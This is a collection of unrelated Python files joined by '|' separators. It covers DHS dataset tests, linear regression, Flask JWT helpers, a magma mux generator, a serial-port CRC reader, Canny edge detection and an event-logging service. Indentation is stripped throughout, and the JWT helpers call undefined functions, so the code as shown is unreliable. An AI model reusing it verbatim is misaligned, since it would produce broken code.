resources = [{'name': 'DHS Quickstats Data for Afghanistan', 'description': 'HXLated csv containing DHS Quickstats data', 'format': 'csv', 'resource_type': 'file.upload', 'url_type': 'upload'},
{'name': 'DHS Mobile Data for Afghanistan', 'description': 'HXLated csv containing DHS Mobile data', 'format': 'csv', 'resource_type': 'file.upload', 'url_type': 'upload'}]
subdataset = {'name': 'dhs-subnational-data-for-afghanistan', 'title': 'Afghanistan - Subnational Demographic and Health Data',
'notes': 'Contains data from the [DHS data portal](https://api.dhsprogram.com/). There is also a dataset containing [Afghanistan - National Demographic and Health Data](https://feature-data.humdata.org/dataset/dhs-data-for-afghanistan) on HDX.\n\nThe DHS Program Application Programming Interface (API) provides software developers access to aggregated indicator data from The Demographic and Health Surveys (DHS) Program. The API can be used to create various applications to help analyze, visualize, explore and disseminate data on population, health, HIV, and nutrition from more than 90 countries.',
'maintainer': '196196be-6037-4488-8b71-d786adf4c081', 'owner_org': '45e7c1a1-196f-40a5-a715-9d6e934a7f70',
'data_update_frequency': '365', 'subnational': '1', 'groups': [{'name': 'afg'}],
'tags': [{'name': 'hxl', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
{'name': 'health', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
{'name': 'demographics', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}],
'dataset_date': '01/01/2015-12/31/2015'}
subresources = [{'name': 'DHS Quickstats Data for Afghanistan', 'description': 'HXLated csv containing DHS Quickstats data', 'format': 'csv', 'resource_type': 'file.upload', 'url_type': 'upload'}]
@pytest.fixture(scope='function')
def configuration(self):
Configuration._create(hdx_site='feature', user_agent='test', hdx_key='12345',
project_config_yaml=join('tests', 'config', 'project_configuration.yml'))
Locations.set_validlocations([{'name': 'afg', 'title': 'Afghanistan'}, {'name': 'cmr', 'title': 'Cameroon'}])
Country.countriesdata(use_live=False)
Vocabulary._tags_dict = True
Vocabulary._approved_vocabulary = {'tags': [{'name': 'hxl'}, {'name': 'health'}, {'name': 'demographics'}], 'id': '4e61d464-4943-4e97-973a-84673c1aaa87', 'name': 'approved'}
return Configuration.read()
@pytest.fixture(scope='function')
def downloader(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://haha/countries':
def fn():
return {'Data': [TestDHS.countrydata]}
response.json = fn
elif url == 'http://haha/tags/AF':
def fn():
return {'Data': TestDHS.tags}
response.json = fn
elif url == 'http://haha/publications/AF':
def fn():
return {'Data': TestDHS.publications}
response.json = fn
return response
@staticmethod
def get_tabular_rows(url, **kwargs):
file = None
headers = ['ISO3', 'DataId', 'Indicator', 'Value', 'Precision', 'DHS_CountryCode', 'CountryName',
'SurveyYear', 'SurveyId', 'IndicatorId', 'IndicatorOrder', 'IndicatorType',
'CharacteristicId', 'CharacteristicOrder', 'CharacteristicCategory',
'CharacteristicLabel', 'ByVariableId', 'ByVariableLabel', 'IsTotal', 'IsPreferred',
'SDRID', 'RegionId', 'SurveyYearLabel', 'SurveyType', 'DenominatorWeighted',
'DenominatorUnweighted', 'CILow', 'CIHigh']
if url == 'http://haha/data/AF?tagids=0&breakdown=national&perpage=10000&f=csv':
file = 'afg0national.csv'
elif url == 'http://haha/data/AF?tagids=0&breakdown=subnational&perpage=10000&f=csv':
file = 'afg0subnational.csv'
headers.insert(1, 'Location')
elif url == 'http://haha/data/AF?tagids=77&breakdown=national&perpage=10000&f=csv':
file = 'afg77national.csv'
elif url == 'http://haha/data/AF?tagids=77&breakdown=subnational&perpage=10000&f=csv':
ex = DownloadError()
ex.__cause__ = ValueError('Variable RET is undefined')
raise ex
if file is None:
raise ValueError('No file - url %s was not recognised!' % url)
rows = read_list_from_csv(join('tests', 'fixtures', file), headers=1, dict_form=True)
for row in rows:
kwargs['row_function'](headers, row)
return headers, rows
@staticmethod
def hxl_row(headers, hxltags, dict_form):
return {header: hxltags.get(header, '') for header in headers}
return Download()
def test_get_countriesdata(self, downloader):
countriesdata = get_countries('http://haha/', downloader)
assert countriesdata == [TestDHS.country]
def test_get_tags(self, downloader):
tags = get_tags('http://haha/', downloader, 'AF')
assert tags == TestDHS.tags
def test_get_publication(self, downloader):
publication = get_publication('http://haha/', downloader, 'AF')
assert publication == TestDHS.publications[-1]
def test_generate_datasets_and_showcase(self, configuration, downloader):
with temp_dir('DHS') as folder:
dataset, subdataset, showcase, bites_disabled = \
generate_datasets_and_showcase(configuration, 'http://haha/', downloader, folder, TestDHS.country, TestDHS.tags)
assert dataset == TestDHS.dataset
resources = dataset.get_resources()
assert resources == TestDHS.resources
assert subdataset == TestDHS.subdataset
assert subdataset.get_resources() == TestDHS.subresources
assert showcase == {'name': 'dhs-data-for-afghanistan-showcase', 'title': 'Final Report', 'notes': 'Afghanistan Demographic and Health Survey 2015',
'url': 'https://www.dhsprogram.com/pubs/pdf/FR323/FR323.pdf', 'image_url': 'https://www.dhsprogram.com/publications/images/thumbnails/FR323.jpg',
'tags': [{'name': 'hxl', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}, {'name': 'health', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}, {'name': 'demographics', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}]}
assert bites_disabled == {'national': [False, False, False], 'subnational': [False, False, False]}
file = 'DHS Quickstats_national_AFG.csv'
assert_files_same(join('tests', 'fixtures', file), join(folder, file))
file = 'DHS Mobile_national_AFG.csv'
assert_files_same(join('tests', 'fixtures', file), join(folder, file))
file = 'DHS Quickstats_subnational_AFG.csv'
assert_files_same(join('tests', 'fixtures', file), join(folder, file))
def test_generate_resource_view(self):
dataset = Dataset(TestDHS.dataset)
resource = copy.deepcopy(TestDHS.resources[0])
resource['id'] = '123'
resource['url'] = 'https://test-data.humdata.org/dataset/495bf9ef-afab-41ac-a804-ca5978aa4213/resource/703d04ef-1787-44b1-92d5-c4ddd283d33f/download/dhs-quickstats_national_afg.csv'
dataset.add_update_resource(resource)
resource_view = generate_resource_view(dataset, bites_disabled=[True, True, True])
assert resource_view is None
resource_view = generate_resource_view(dataset, bites_disabled=[False, True, False])
assert resource_view == {'resource_id': '123', 'description': '', 'title': 'Quick Charts', 'view_type': 'hdx_hxl_preview',
'hxl_preview_config': '{"configVersion": 5, "bites": [{"tempShowSaveCancelButtons": false, "ingredient": {"valueColumn": "#indicator+value+num", "aggregateFunction": "sum", "dateColumn": null, "comparisonValueColumn": null, "comparisonOperator": null, "filters": {"filterWith": [{"#date+year": "$MAX$"}, {"#indicator+code": "CM_ECMR_C_IMR"}, {"#indicator+label+code": "14003"}]}, "title": "Infant Mortality Rate", "description": "Rate is for the period of 10 years preceding the survey"}, "type": "key figure", "errorMsg": null, "computedProperties": {"explainedFiltersMap": {}, "pieChart": false, "dataTitle": "Value"}, "uiProperties": {"swapAxis": true, "showGrid": true, "color": "#1ebfb3", "sortingByValue1": "DESC", "sortingByCategory1": null, "internalColorPattern": ["#1ebfb3", "#0077ce", "#f2645a", "#9C27B0"], "dataTitle": "Percent", "postText": "percent"}, "dataProperties": {}, "displayCategory": "Charts", "hashCode": -487125335}, {"tempShowSaveCancelButtons": false, "ingredient": {"valueColumn": "#indicator+value+num", "aggregateFunction": "sum", "dateColumn": null, "comparisonValueColumn": null, "comparisonOperator": null, "filters": {"filterWith": [{"#date+year": "$MAX$"}, {"#indicator+code": "ED_LITR_W_LIT"}]}, "title": "Women who are Literate", "description": ""}, "type": "key figure", "errorMsg": null, "computedProperties": {"explainedFiltersMap": {}, "pieChart": false, "dataTitle": "Value"}, "uiProperties": {"swapAxis": true, "showGrid": true, "color": "#1ebfb3", "sortingByValue1": "ASC", "sortingByCategory1": null, "internalColorPattern": ["#1ebfb3", "#0077ce", "#f2645a", "#9C27B0"], "dataTitle": "Percent", "postText": "percent"}, "dataProperties": {}, "displayCategory": "Charts", "hashCode": -539301812}], "recipeUrl": "https://raw.githubusercontent.com/mcarans/hxl-recipes/dev/recipes/dhs/recipe.json"}'} |
from random import shuffle
def midrand(sentence):
words = sentence.split()
newwords = [randomized(word) for word in words]
newsentence = ' '.join(newwords)
if sentence == newsentence:
return "They can't be different"
else:
return newsentence
def randomized(word):
if len(set(word[1:-1])) < 2:
return word
mid = range(1, len(word) - 1)
while True:
pre = mid[:]
shuffle(mid)
isdiff = False
for j in range(len(mid)):
if word[pre[j]] != word[mid[j]]:
isdiff = True
break
if isdiff:
break
newword = word[0]
for i in mid:
newword += word[i]
newword += word[-1]
return newword
def main():
tests = []
tests.append("A")
tests.append("I eat apple")
tests.append("A fox runs so fast that it suddenly die")
for test in tests:
print
test
print
midrand(test)
print
if __name__ == "__main__":
main()
|
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
class Linear_regression:
def __init__(self, theta, alpha):
self.theta = theta
self.alpha = alpha
def computeCost(self, X, y, theta=None):
inner = np.power((np.dot(X, theta.T) - y), 2)
return np.sum(inner) / (2 * len(X))
def gradientDescent(self, X, y, iters):
cost = np.zeros([iters,1])
assert self.theta.shape[1] == X.shape[1], "The axis=1's shape of theta and X should be same"
temp = np.zeros_like(self.theta)
parameters = self.theta.shape[1]
length = len(X)
for i in range(iters):
error = np.dot(X, self.theta.T) - y
for j in range(parameters):
# Should pay attention to the shape of X[:, j]
term = error * X[:, j].reshape(length,1)
temp[0,j] = self.theta[0,j] - self.alpha / length * np.sum(term)
self.theta = temp
cost[i] = self.computeCost(X, y, self.theta)
return self.theta, cost
def predict(self, X):
return np.dot(X, self.theta.T)
if __name__ == "__main__":
path = 'ex1data1.txt'
print(os.getcwd())
data = pd.read_csv(path, header=None, names=['Population', 'Profit'])
print(data.head())
print(data.describe())
data.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))
#plt.show()
data.insert(0, 'Ones', 1)
print(data.head())
columns = data.shape[1]
X = data.iloc[:,0:columns-1]#X是所有行,去掉最后一列
y = data.iloc[:,columns-1:columns]#y是所有行,最后一列
print(X.head(),y.head())
X = np.array(X.values)
y = np.array(y.values)
alpha = 0.01
iters = 1000
theta = np.zeros([1, X.shape[1]])
print(X.shape, theta.shape, y.shape)
model = Linear_regression(theta, alpha)
theta, cost = model.gradientDescent(X, y, iters)
print(theta, cost[-1]) |
import jwt
import datetime
from functools import wraps
from application.models import db, User
from flask import current_app, request, g, abort, jsonify
def identity(token_or_payload):
payload = _ensure_decode(token_or_payload)
user_id = payload.get('user_id')
return User.find(id=user_id, active=True)
def is_expired_token(token_or_payload):
payload = _ensure_decode(token_or_payload)
now = datetime.datetime.now()
exp_date = payload.get('expired_date')
if exp_date:
expired_date = _convert_datestring_to_dateobject(exp_date)
return now > expired_date
else:
raise Exception('Cannot get expired date in token')
def required_token(f):
@wraps(f)
def wrapper(*args, **kwargs):
token = request.headers.get('token', None)
if token:
user = identity(token)
if user:
g.user = user
return f(*args, **kwargs)
return abort(401)
return wrapper
def generate_token(user_id):
payload = dict(user_id=user_id, type='access')
expired_date = datetime.datetime.now() + datetime.timedelta(minutes=current_app.config.get('JWT_EXPIRED_IN_MIN'))
payload['expired_date'] = str(expired_date)
return encode(payload)
def generate_refresh_token(user_id):
payload = dict(user_id=user_id, type='refresh')
expired_date = datetime.datetime.now() + datetime.timedelta(days=current_app.config.get('JWT_REFRESH_EXPIRED_IN_DAY'))
payload['expired_date'] = str(expired_date)
return encode(payload)
def encode(payload):
return jwt.encode(payload, current_app.config.get('JWT_SECRET_KEY'),
algorithm=current_app.config.get('JWT_ALGOR')).decode('utf-8')
def decode(token):
payload = jwt.decode(token, current_app.config.get('JWT_SECRET_KEY'),
algorithm=current_app.config.get("JWT_ALGOR"))
return payload
def valid_refresh_token(refresh_token):
payload = ensure_decode(refresh_token)
return identity(payload) and not is_expired_token(payload) and payload.get('type') == 'refresh'
def valid_registration_token(registration_token):
payload = ensure_decode(registration_token)
return payload.get('type') == 'registration' and registration_identity(payload)
def get_user_from_token(token):
payload = decode(token)
user = identity(payload)
return user
def _convert_datestring_to_dateobject(datestring):
dt, msec = datestring.split('.')
date, time = dt.split(' ')
return datetime.datetime(*map(lambda x: int(x), list(date.split('-') + time.split(':'))))
def _ensure_decode(token_or_payload):
if type(token_or_payload) is not dict:
payload = decode(token_or_payload)
else:
payload = token_or_payload
return payload
|
import hwtypes as ht
from hwtypes import BitVector, UIntVector, SIntVector
from magma.array import Array
from magma.bit import Bit
from magma.bits import Bits, UInt, SInt
from magma.bitutils import clog2, seq2int
from magma.circuit import coreir_port_mapping
from magma.generator import Generator2
from magma.interface import IO
from magma.protocol_type import MagmaProtocol, magma_type
from magma.t import Type, In, Out, Direction
from magma.tuple import Product, Tuple
from magma.type_utils import type_to_sanitized_string
from magma.conversions import tuple_
class CoreIRCommonLibMuxN(Generator2):
def __init__(self, N: int, width: int):
self.name = f"coreir_commonlib_mux{N}x{width}"
FlatT = Array[width, Bit]
MuxInT = Product.from_fields("anon", dict(data=Array[N, FlatT],
sel=Array[clog2(N), Bit]))
self.io = IO(I=In(MuxInT), O=Out(Array[width, Bit]))
self.renamed_ports = coreir_port_mapping
self.coreir_name = "muxn"
self.coreir_lib = "commonlib"
self.coreir_genargs = {"width": width, "N": N}
self.primitive = True
self.stateful = False
def simulate(self, value_store, state_store):
sel = BitVector[clog2(N)](value_store.get_value(self.I.sel))
out = BitVector[width](value_store.get_value(self.I.data[int(sel)]))
value_store.set_value(self.O, out)
self.simulate = simulate
class Mux(Generator2):
def __init__(self, height: int, T: Type):
if issubclass(T, BitVector):
T = Bits[len(T)]
if issubclass(T, (bool, ht.Bit)):
T = Bit
# TODO(rsetaluri): Type should be hashable so the generator instance can
# be cached.
T_str = type_to_sanitized_string(T)
self.name = f"Mux{height}x{T_str}"
N = magma_type(T).flat_length()
ports = {f"I{i}": In(T) for i in range(height)}
T_S = Bit if height == 2 else Array[clog2(height), Bit]
ports["S"] = In(T_S)
ports["O"] = Out(T)
self.io = io = IO(**ports)
mux = CoreIRCommonLibMuxN(height, N)()
data = [Array[N, Bit](getattr(io, f"I{i}").flatten())
for i in range(height)]
mux.I.data @= Array[height, Array[N, Bit]](data)
if height == 2:
mux.I.sel[0] @= io.S
else:
mux.I.sel @= io.S
out_ts = mux.O.ts
if issubclass(T, MagmaProtocol):
out = Out(T)._from_magma_value_(T._to_magma_().unflatten(out_ts))
else:
out = T.unflatten(out_ts)
io.O @= out
def _infer_mux_type(args):
"""
Try to infer type by traversing arguments in order:
* If we encounter a magma Type/Protocol, use that
* BitVector/Bit/bool are converted to their magma equivalent Bits/Bit
* Python tuple is converted to m.Tuple (note this will invoke m.tuple_ on
all the arguments, which may raise an error if the tuple arguments are
not well formed)
Note that we do not infer from standard python int arguments because we
cannot, in general, determine the correct bit width (use BitVector instead)
"""
T = None
for arg in args:
if isinstance(arg, (Type, MagmaProtocol)):
next_T = type(arg).qualify(Direction.Undirected)
elif isinstance(arg, UIntVector):
next_T = UInt[len(arg)]
elif isinstance(arg, SIntVector):
next_T = SInt[len(arg)]
elif isinstance(arg, BitVector):
next_T = Bits[len(arg)]
elif isinstance(arg, (ht.Bit, bool)):
next_T = Bit
elif isinstance(arg, tuple):
next_T = type(tuple_(arg))
elif isinstance(arg, int):
# Cannot infer type without width, use wiring implicit coercion to
# handle (or raise type error there)
continue
if T is not None:
if issubclass(T, next_T):
# upcast
T = next_T
elif not next_T.is_wireable(T) and not T.is_wireable(next_T):
raise TypeError(
f"Found incompatible types {next_T} and {T} in mux"
" inference"
)
else:
T = next_T
if T is None:
raise TypeError(
f"Could not infer mux type from {args}\n"
"Need at least one magma value, BitVector, bool or tuple")
if issubclass(T, Tuple):
args = [tuple_(a) for a in args]
return T, args
infer_mux_type = _infer_mux_type
def mux(I: list, S, **kwargs):
"""
How type inference works on I:
This operator will traverse the list of inputs I and use the first
magma value to determine the type. This allows I to contain coerceable
objects like ints (e.g. `mux([1, x], s)` where `x: UInt[2]`). Coercion
is peformed when wiring the arguments to the input of an instance of
Mux(T) (where T is the type of the first magma value) and will raise an
error there if one of the values cannot be coerced to T.
**NOTE** This will fail if the type of the first magma value cannot
coerce subsequent arguments (even though the type of a later argument
might be able to coerce the type of the earliest argument). We plan to
improve the algorithm to support the more general cases, but until
then, if you run into this problem, use `Mux(T)` where `T` can coerce
all arguments.
"""
if isinstance(S, Type) and S.const():
S = seq2int(S.bits())
if isinstance(S, int):
return I[S]
T, I = _infer_mux_type(I)
inst = Mux(len(I), T)(**kwargs)
if len(I) == 2 and isinstance(S, Bits[1]):
S = S[0]
result = inst(*I, S)
for i in range(len(I)):
if getattr(inst, f"I{i}").value() is None:
arg = I[i]
raise TypeError(f"mux arg I[{i}] ({arg}: {type(arg)}) does not "
f"match inferred input port type {T}")
return result
# Monkey patch for ite impl without circular dependency
Bit._mux = staticmethod(mux)
# NOTE(rsetaluri): We monkeypatch this function on to Array due to the circular
# dependency between Mux and Array. See the discussion on
# https://github.com/phanrahan/magma/pull/658.
def _dynamic_mux_select(this, key):
return mux(this.ts, key)
Array.dynamic_mux_select = _dynamic_mux_select
def dict_lookup(dict_, select, default=0):
"""
Use `select` as an index into `dict` (similar to a case statement)
`default` is used when `select` does not match any of the keys and has a
default value of 0
"""
output = default
for key, value in dict_.items():
output = mux([output, value], key == select)
return output
def list_lookup(list_, select, default=0):
"""
Use `select` as an index into `list` (similar to a case statement)
`default` is used when `select` does not match any of the indices (e.g.
when the select width is longer than the list) and has a default value of
0.
"""
output = default
for i, elem in enumerate(list_):
output = mux([output, elem], i == select)
return output
|
""" Tests for test cases directory. """
# TODO: check http://code.google.com/p/unladen-swallow/wiki/Benchmarks
import os
import unittest
from pythran.tests import TestFromDir
class TestCases(TestFromDir):
""" Class to check all tests in the cases directory. """
path = os.path.join(os.path.dirname(__file__), "cases")
TestCases.populate(TestCases)
if __name__ == '__main__':
unittest.main()
|
import serial
import time
serial_com = 'com8'
serial_bps = 9600
class MySerial(object):
def __init__(self, com, bps):
# assert isinstance(ser, serial.Serial)
# 连接串口 com是串口号,bps是波特率固定值9600
self.ser = serial.Serial(com, int(bps), parity="E", stopbits=1, bytesize=8)
def read(self):
print("读取数据:", end=" ")
while True:
if self.ser.inWaiting():
data = self.ser.read(self.ser.inWaiting())
else:
break
print(data)
print("读取完成")
return data
def write(self,data):
# 数据发送, data的数据类型是字节流。
self.ser.write(data)
return True
def crc16(self, x):
# crc检验.
a = 0xFFFF
b = 0xA001
for byte in x:
a ^= byte
for i in range(8):
last = a % 2
a >>= 1
if last == 1:
a ^= b
return x+[a&0xFF, a>>8]
def close(self):
self.ser.close()
m_serial = MySerial(serial_com, serial_bps)#打开串口连接
if __name__ == '__main__':
w = [0X42,0X4D,0XE3,0X00,0X00,0X01,0X72]#请求数据的指令--硬件的数据请求指令
myserial = MySerial("com8",9600)
while True:
myserial.write(bytes(w))
time.sleep(0.3)
data = myserial.read().hex()
s = [data[i:i+2] for i in range(0, len(data), 2)]
res = int(s[2], 16)*256+int(s[8], 16)
print(res)
time.sleep(4)
# res = s[8]*255+s[9]*8+s[10]
# print(f"浓度:{res}") |
#!/usr/bin/env python
import math
import time
import numpy
import random
from scipy import ndimage
#from appionlib.apImage import imagefile
"""
adapted from:
http://code.google.com/p/python-for-matlab-users/source/browse/Examples/scipy_canny.py
"""
#=======================
#=======================
def getRadialAndAngles(shape):
## create a grid of distance from the center
xhalfshape = shape[0]/2.0
x = numpy.arange(-xhalfshape, xhalfshape, 1) + 0.5
yhalfshape = shape[1]/2.0
y = numpy.arange(-yhalfshape, yhalfshape, 1) + 0.5
xx, yy = numpy.meshgrid(x, y)
radialsq = xx**2 + yy**2 - 0.5
angles = numpy.arctan2(yy,xx)
return radialsq, angles
#=======================
#=======================
def non_maximal_edge_suppresion(mag, orient, minEdgeRadius=20, maxEdgeRadius=None):
"""
Non Maximal suppression of gradient magnitude and orientation.
"""
t0 = time.time()
## bin orientations into 4 discrete directions
abin = ((orient + math.pi) * 4 / math.pi + 0.5).astype('int') % 4
radialsq, angles = getRadialAndAngles(mag.shape)
### create circular mask
if maxEdgeRadius is None:
maxEdgeRadiusSq = radialsq[mag.shape[0]/2,mag.shape[0]/10]
else:
maxEdgeRadiusSq = maxEdgeRadius**2
outermask = numpy.where(radialsq > maxEdgeRadiusSq, False, True)
## probably a bad idea here
innermask = numpy.where(radialsq < minEdgeRadius**2, False, True)
### create directional filters to go with offsets
horz = numpy.where(numpy.abs(angles) < 3*math.pi/4., numpy.abs(angles), 0)
horz = numpy.where(horz > math.pi/4., True, False)
vert = -horz
upright = numpy.where(angles < math.pi/2, False, True)
upleft = numpy.flipud(upright)
upleft = numpy.fliplr(upleft)
upright = numpy.logical_or(upright, upleft)
upleft = -upright
# for rotational edges
filters = [horz, upleft, vert, upright]
# for radial edges
#filters = [vert, upright, horz, upleft]
offsets = ((1,0), (1,1), (0,1), (-1,1))
edge_map = numpy.zeros(mag.shape, dtype='bool')
for a in range(4):
di, dj = offsets[a]
footprint = numpy.zeros((3,3), dtype="int")
footprint[1,1] = 0
footprint[1+di,1+dj] = 1
footprint[1-di,1-dj] = 1
## get adjacent maximums
maxfilt = ndimage.maximum_filter(mag, footprint=footprint)
## select points larger than adjacent maximums
newedge_map = numpy.where(mag>maxfilt, True, False)
## filter by edge orientation
newedge_map = numpy.where(abin==a, newedge_map, False)
## filter by location
newedge_map = numpy.where(filters[a], newedge_map, False)
## add to main map
edge_map = numpy.where(newedge_map, True, edge_map)
## remove corner edges
edge_map = numpy.where(outermask, edge_map, False)
edge_map = numpy.where(innermask, edge_map, False)
#print time.time() - t0
return edge_map
#=======================
#=======================
def canny_edges(image, minedges=5000, maxedges=15000, low_thresh=50, minEdgeRadius=20, maxEdgeRadius=None):
"""
Compute Canny edge detection on an image
"""
t0 = time.time()
dx = ndimage.sobel(image,0)
dy = ndimage.sobel(image,1)
mag = numpy.hypot(dx, dy)
mag = mag / mag.max()
ort = numpy.arctan2(dy, dx)
edge_map = non_maximal_edge_suppresion(mag, ort, minEdgeRadius, maxEdgeRadius)
edge_map = numpy.logical_and(edge_map, mag > low_thresh)
labels, numlabels = ndimage.measurements.label(edge_map, numpy.ones((3,3)))
#print "labels", len(labels)
#print maxs
maxs = ndimage.measurements.maximum(mag, labels, range(1,numlabels+1))
maxs = numpy.array(maxs, dtype=numpy.float64)
high_thresh = maxs.mean()
minThresh = maxs.min()
#print time.time() - t0
edge_count = edge_map.sum()
count = 0
while count < 25:
t0 = time.time()
count += 1
maxs = ndimage.measurements.maximum(mag, labels, range(1,numlabels+1))
maxs = numpy.array(maxs, dtype=numpy.float64)
good_label = (maxs > high_thresh)
good_label = numpy.append([False, ], good_label)
numgood = good_label.sum()
if numgood == numlabels and high_thresh > minThresh:
print "ERROR"
maxs.sort()
print high_thresh
print maxs[:3], maxs[-3:]
print maxs[0], ">", high_thresh, "=", maxs[0] > high_thresh
good_label = numpy.zeros((numlabels+1,), dtype=numpy.bool)
good_label[1:] = maxs > high_thresh
print good_label[:3], good_label[-3:]
time.sleep(10)
newedge_map = good_label[labels]
#for i in range(len(maxs)):
# #if max(mag[labels==i]) < high_thresh:
# if maxs[i] < high_thresh:
# edge_map[labels==i] = False
edge_count = newedge_map.sum()
print "canny edges=%d, (thresh=%.3f) time=%.6f"%(edge_count, high_thresh, time.time() - t0)
if edge_count > maxedges:
rand = math.sqrt(random.random())
new_thresh = high_thresh / rand
# fix for too large values
#print rand, new_thresh
if new_thresh < 1.0:
high_thresh = new_thresh
else:
high_thresh = math.sqrt(high_thresh)
elif edge_count < minedges and high_thresh > minThresh:
rand = math.sqrt(random.random())
new_thresh = high_thresh * rand
#print rand, new_thresh, minThresh
high_thresh = new_thresh
else:
break
#print time.time() - t0
return newedge_map
#=======================
#=======================
#=======================
#=======================
if __name__ == "__main__":
from scipy.misc import lena
from matplotlib import pyplot
lena = lena()
image = ndimage.filters.gaussian_filter(lena, 6)
edgeimage = canny_edges(image, minedges=2500, maxedges=15000, low_thresh=0.001, minEdgeRadius=20, maxEdgeRadius=None)
pyplot.imshow(edgeimage)
pyplot.gray()
pyplot.show()
|
# -*- coding: utf-8 -*-
"""
@Time: 2021/7/14 16:32
@Author: zzhang zzhang@cenboomh.com
@File: ModelUpdate.py
@desc:
"""
import json
from collect.collect_service import CollectService
from collect.utils.collect_utils import get_safe_data
class EventService(CollectService):
data_json_dict = {}
ESConst = {
"data_json_name": "data_json",
"from_name": "from",
"before_params_append_name": "before_params_append",
"to_name": "to",
"bulk_service_name": "bulk_service",
"bulk_result_field_name": "bulk_result_field",
"finish_service_name": "finish_service",
"log_create_name": "log_create",
"log_update_name": "log_update",
"log_save_service_name": "log_save_service",
"log_update_service_name": "log_update_service"
}
def __init__(self, op_user):
CollectService.__init__(self, op_user)
self.event_template = None
self.to_services = None
self.create_log_list = []
self.update_log_list = []
def get_log_create_name(self):
return self.ESConst["log_create_name"]
def get_log_save_service_name(self):
return self.ESConst["log_save_service_name"]
def get_log_update_service_name(self):
return self.ESConst["log_update_service_name"]
def get_log_update_name(self):
return self.ESConst["log_update_name"]
def get_finish_service_name(self):
return self.ESConst["finish_service_name"]
def get_bulk_result_field_name(self):
return self.ESConst["bulk_result_field_name"]
def set_to_services(self, to_services):
self.to_services = to_services
def get_to_services(self):
return self.to_services
def get_bulk_service_name(self):
return self.ESConst["bulk_service_name"]
def get_before_params_append_name(self):
return self.ESConst["before_params_append_name"]
def get_from_name(self):
return self.ESConst["from_name"]
def get_event_template(self):
return self.event_template
def set_event_template(self, event_template):
self.event_template = event_template
def get_data_json_name(self):
return self.ESConst["data_json_name"]
def get_to_name(self):
return self.ESConst["to_name"]
@staticmethod
def get_json_content(path):
return get_safe_data(path, EventService.data_json_dict)
@staticmethod
def set_json_content(path, data_json_content):
EventService.data_json_dict[path] = data_json_content
def get_data_json_config_path(self):
data_json = get_safe_data(self.get_data_json_name(), self.template)
config_dir = self.get_config_dir()
config_file = config_dir + "/" + data_json
return config_file
def get_data_json(self, params):
config_file_path = self.get_data_json_config_path()
json_content = self.get_json_content(config_file_path)
if json_content:
return self.success(json_content)
data_json = get_safe_data(self.get_data_json_name(), self.template)
data_json_result = self.get_config_file(data_json, params)
if self.is_success(data_json_result):
data_json_content = self.get_data(data_json_result)
self.set_json_content(config_file_path, data_json_content)
return data_json_result
def get_event_param(self, data_json_templ):
from collect.service_imp.common.filters.template_tool import TemplateTool
# tool = TemplateTool(op_user=self.op_user)
# data_json = tool.render(data_json_templ, params_result)
try:
import json
data_json = json.loads(data_json_templ)
return self.success(data_json)
except Exception as e:
self.log(data_json_templ, "error")
return self.fail(str(e) + " JSON格式有误,请检查配置")
def event_check(self):
from_services = get_safe_data(self.get_from_name(), self.get_event_template())
if not from_services:
return self.fail("没有配置来源服务")
params_result = self.get_params_result()
from_service = get_safe_data(self.get_from_service_name(), params_result)
if from_service not in from_services:
return self.fail("非法服务,请检查配置")
return self.success([])
def before_event(self):
params_result = self.get_params_result()
event_template = self.get_event_template()
appends = get_safe_data(self.get_before_params_append_name(), event_template)
if appends:
# 添加一些变量
tool = self.get_render_tool()
for item in appends:
field = get_safe_data(self.get_field_name(), item)
temp = get_safe_data(self.get_template_name(), item)
params_result[field] = self.get_render_data(temp, params_result, tool)
to_services = get_safe_data(self.get_to_name(), event_template)
if not to_services:
return self.fail("没有找到目标服务")
tool = self.get_render_tool()
services = []
# 拼接服务
for index, to_service in enumerate(to_services):
service = get_safe_data(self.get_service_name(), to_service)
if not self.is_enable(to_service, params_result):
continue
if not service:
return self.fail(" 第 " + str(index + 1) + "个服务没有配置 " + self.get_service_name())
# 处理外部参数
for field in to_service:
temp = to_service[field]
if self.is_template_text(temp):
to_service[field] = tool.render(temp, params_result)
# 处理service
self.get_node_service(to_service, params_result)
# 添加日志
service_item = get_safe_data(self.get_service_name(), to_service)
self.add_create_log_data(service_item)
services.append(service_item)
if len(services) <= 0:
return self.fail("没有找的事件执行服务")
self.set_to_services(services)
self.create_log_data()
return self.success([])
def get_template_log(self):
log = get_safe_data(self.get_log_name(), self.get_event_template())
import copy
return copy.deepcopy(log)
def can_log_data(self):
"""
判断是否需要记录日志
"""
log = self.get_template_log()
if not log:
return False
else:
return True
def get_service_item_params(self, service_item=None, result=None, create_log_list=None, update_log_list=None):
item = {
"params": self.get_params_result()
}
if service_item:
item["service_item"] = service_item
if result:
item["result"] = result
if update_log_list:
item["update_log_list"] = update_log_list
if create_log_list:
item["create_log_list"] = create_log_list
return item
def get_log_data(self, node_name, service_item=None, result=None, create_log_list=None, update_log_list=None):
template_log = self.get_template_log()
params = self.get_service_item_params(service_item=service_item, result=result, create_log_list=create_log_list,
update_log_list=update_log_list)
log = get_safe_data(node_name, template_log)
service = {self.get_service_name(): log}
create_item = self.get_node_service(service, params, append_param=False)
if not self.is_success(create_item):
self.log(self.get_msg(create_item), level="error")
return False
return self.get_data(create_item)
def add_create_log_data(self, service_item):
"""
添加日志记录
"""
if not self.can_log_data():
return False
create_item = self.get_log_data(node_name=self.get_log_create_name(), service_item=service_item)
if create_item:
self.create_log_list.append(create_item)
def create_log_data(self):
"""
执行日志添加服务
"""
if not self.can_log_data():
return False
create_log_service = self.get_log_data(node_name=self.get_log_save_service_name(),
create_log_list=self.create_log_list)
create_log_service_result = self.get_service_result(create_log_service)
if not self.is_success(create_log_service_result):
self.log(self.get_msg(create_log_service_result), level="error")
def add_update_log_data(self, service_item, result):
"""
添加更新日志
"""
if not self.can_log_data():
return False
update_item = self.get_log_data(node_name=self.get_log_update_name(), service_item=service_item, result=result)
if update_item:
self.update_log_list.append(update_item)
def update_log_data(self):
"""
执行日志更新服务
"""
if not self.can_log_data():
return False
update_log_service = self.get_log_data(node_name=self.get_log_update_service_name(),
update_log_list=self.update_log_list)
